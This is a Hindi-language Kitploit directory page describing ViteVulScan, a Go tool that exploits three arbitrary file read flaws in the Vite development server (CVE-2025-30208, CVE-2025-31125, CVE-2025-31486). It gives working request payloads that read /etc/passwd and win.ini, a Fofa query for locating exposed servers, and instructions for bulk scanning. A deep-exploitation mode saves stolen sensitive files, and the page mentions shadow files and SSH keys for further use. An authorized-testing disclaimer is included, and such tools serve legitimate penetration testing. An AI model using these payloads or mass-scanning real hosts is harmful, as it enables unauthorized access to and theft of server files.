Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/jackieya/vitevulscan
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाफज़िंग
GitHubjackieya/vitevulscan

ViteVulScan

CVE-2025-30208 और CVE-2025-31125 के लिए एक्सप्लॉइट

रिपॉजिटरी देखें
71 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
ViteVulScan — CVE-2025-30208 और CVE-2025-31125 के लिए एक्सप्लॉइट | Kitploit

ViteVulScan

भेद्यता परिचय

इस परियोजना में 3 भेद्यताएँ शामिल हैं: CVE-2025-30208/CVE-2025-31125/CVE-2025-31486, ये सभी Vite डेवलपमेंट सर्वर में आर्बिट्रेरी फ़ाइल रीड भेद्यताएँ हैं, ये तीनों भेद्यताएँ व्यापक कवरेज वाली हैं और उपयोग में सरल और अप्रतिबंधित हैं।

भेद्यता POC:

CVE-2025-30208:

Windows: /@fs/C://Windows/win.ini?import&raw??

Linux: /@fs/etc/passwd?import&raw??

CVE-2025-31125

Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/etc/passwd?import&?inline=1.wasm?init

CVE-2025-31486

Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init

पथ में /@fs की आवश्यकता नहीं है।

Fofa मैपिंग सिंटैक्स:

body="/@vite/client"

टूल उपयोग परिचय

टूल की विशेषताएँ

  1. Fofa के साथ एकीकृत होकर बल्क उपयोग कर सकता है
  2. यह भेद्यता वाले सटीक पथ को पार्स करेगा और गहन उपयोग करेगा
  3. Go की समवर्ती क्षमताओं का पूर्ण उपयोग करके, कम समय में बड़ी संख्या में संपत्तियों का तेज़ बल्क पता लगाना संभव है।

संकलन निर्देश

go संस्करण: go 1.20 और उससे ऊपर का संस्करण

प्रोजेक्ट रूट डायरेक्टरी में जाएँ

पहले निर्भरताएँ सिंक करें

go mod tidy

फिर प्रोजेक्ट को कंपाइल करें

go build -o ViteVulScan -ldflags="-s -w" -trimpath .

./ViteVulScan चलाकर स्क्रिप्ट को चलाया जा सकता है।

आप प्रोजेक्ट रूट डायरेक्टरी में सीधे भी प्रोजेक्ट चला सकते हैं:

go run .

कॉन्फ़िगरेशन

स्क्रिप्ट Fofa के साथ एकीकृत होकर संपत्तियों की खोज करने और फिर बल्क जाँच करने का समर्थन करती है।

Fofa का उपयोग करने के लिए, सुनिश्चित करें कि app.ini फ़ाइल और कंपाइल की गई बाइनरी फ़ाइल एक ही डायरेक्टरी में हों, और config डायरेक्टरी में app.ini फ़ाइल को संशोधित करना होगा, जिसमें fofakey फ़ील्ड में अपनी fofakey भरें, और num में अनुमानित संपत्तियों की संख्या जिसे आप जाँचना चाहते हैं।

यदि आपके पास इस भेद्यता के लिए बेहतर Fofa मैपिंग सिंटैक्स है, तो आप fofaQuery फ़ील्ड को स्वयं संशोधित कर सकते हैं।

कमांड लाइन पैरामीटर परिचय

Usage of ./ViteVulScan:

स्पष्टीकरण

  1. एक फ़ाइल में सभी लक्ष्य URL की बल्क जाँच करें, सुनिश्चित करें कि फ़ाइल में प्रति पंक्ति एक URL हो, URL पूर्ण URL (http सहित) या डोमेन नाम या IP हो सकता है, उदाहरण के लिए:
    root@kitploit:~
      http://example1.com 
      example2.com
      127.0.0.1
    
  2. जब -fofa और -f पैरामीटर निर्दिष्ट करके जाँच की जाती है, तो भेद्यता वाली संपत्तियाँ स्वचालित रूप से वर्तमान फ़ाइल के अंतर्गत सहेजी जाएँगी, फ़ाइल नाम प्रारूप "वर्तमान टाइमस्टैम्प.csv" होगा।
  3. यह Linux और Windows प्लेटफ़ॉर्म पर उपयोग का समर्थन करता है, उपयोग की जाने वाली डिक्शनरी क्रमशः dict निर्देशिका में linux_sensitive_path.txt और windows_sensitive_path.txt हैं। यदि अधिक संवेदनशील पथ हैं, तो आप संबंधित डिक्शनरी में स्वयं जोड़ सकते हैं।

उदाहरण

उदाहरण 1: Fofa के साथ एकीकृत होकर बल्क जाँच:

./ViteVulScan -fofa

image-20250410145741383

स्कैन समाप्त होने के बाद, result निर्देशिका में सफलतापूर्वक उपयोग किए गए URL का CSV फ़ाइल दिखाई देगा, जो टाइमस्टैम्प के नाम से होगा:

image-20250410151756704

उदाहरण 2: भेद्यता वाले URL का गहन उपयोग:

./ViteVulScan -u example.com -e

image-20250410150341952

यदि "उपयोग सफल" दिखाई देता है, तो result निर्देशिका देखें, वहाँ स्कैन किए गए URL के नाम पर एक निर्देशिका होगी, स्कैन की गई संवेदनशील फ़ाइलों की सामग्री मूल फ़ाइल प्रारूप में पार्स करके संबंधित पथ पर सहेजी जाएगी, प्रभाव नीचे दिखाया गया है:

image-20250410150836985

सहेजी गई result/localhost:5173/etc/passwd की सामग्री के उदाहरण में, संवेदनशील जानकारी की पूरी सामग्री सहेजी गई दिखाई देती है, जो आगे के उपयोग के लिए सुविधाजनक है (यदि /etc/shadow या सर्वर की SSH प्राइवेट की पढ़ी जा सके, तो आगे उपयोग किया जा सकता है)।

image-20250410151044619

अस्वीकरण

यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, कृपया अवैध उद्देश्यों के लिए उपयोग न करें। इस उपकरण का उपयोग करके किसी भी अनधिकृत परीक्षण के परिणामस्वरूप होने वाले परिणाम उपयोगकर्ता स्वयं वहन करेगा।

अद्यतन

29 मार्च को पहली रिलीज़:

  • Fofa के साथ संपत्ति संग्रह कार्यक्षमता लागू की
  • CVE_2025_30208 भेद्यता का उपयोग करके बल्क सत्यापन लागू किया
  • कमांड लाइन पार्सिंग कार्यक्षमता जोड़ी

1 अप्रैल:

  • गहन उपयोग कार्यक्षमता लागू की

2 अप्रैल:

  • हाल ही में सामने आई CVE_2025_31125 भेद्यता के लिए सत्यापन जोड़ा।

9 अप्रैल:

  • Fofa मॉड्यूल की त्रुटियाँ सुधारी गईं।
  • समवर्ती कार्यक्षमता जोड़ी गई, जो तेज़ी से बल्क में संपत्तियों में भेद्यता की जाँच का समर्थन करती है।
  • CVE_2025_31486 के लिए सत्यापन जोड़ा गया
  • प्रोजेक्ट फ़ाइल संरचना संशोधित की गई
टूल डाउनलोड करें
पैरामीटरविवरण
-cveकिस CVE भेद्यता का उपयोग करके जाँच करना है। CVE_2025_30208/CVE_2025_31125/CVE_2025_31486 समर्थित हैं। डिफ़ॉल्ट CVE_2025_30208 है।
-fofaइस पैरामीटर को निर्दिष्ट करने पर, Fofa के साथ एकीकृत होकर संपत्तियों का मैप करेगा और प्राप्त लक्ष्य संपत्तियों पर बल्क जाँच करेगा
-u | -urlएकल URL लक्ष्य निर्दिष्ट करें और उसकी जाँच करें
-f | -filenameएक फ़ाइल नाम निर्दिष्ट करें, उसमें URL पतों की बल्क जाँच करें
-eइस पैरामीटर को निर्दिष्ट करने पर, भेद्यता वाली संपत्तियों का गहन उपयोग किया जाएगा, विभिन्न संभावित संवेदनशील फ़ाइलों को पढ़कर स्थानीय रूप से सहेजा जाएगा। (कृपया इस सुविधा का सावधानीपूर्वक उपयोग करें, बेहतर है कि एकल लक्ष्य पर जाँच करें, यानी -u के साथ इस पैरामीटर का उपयोग करें।)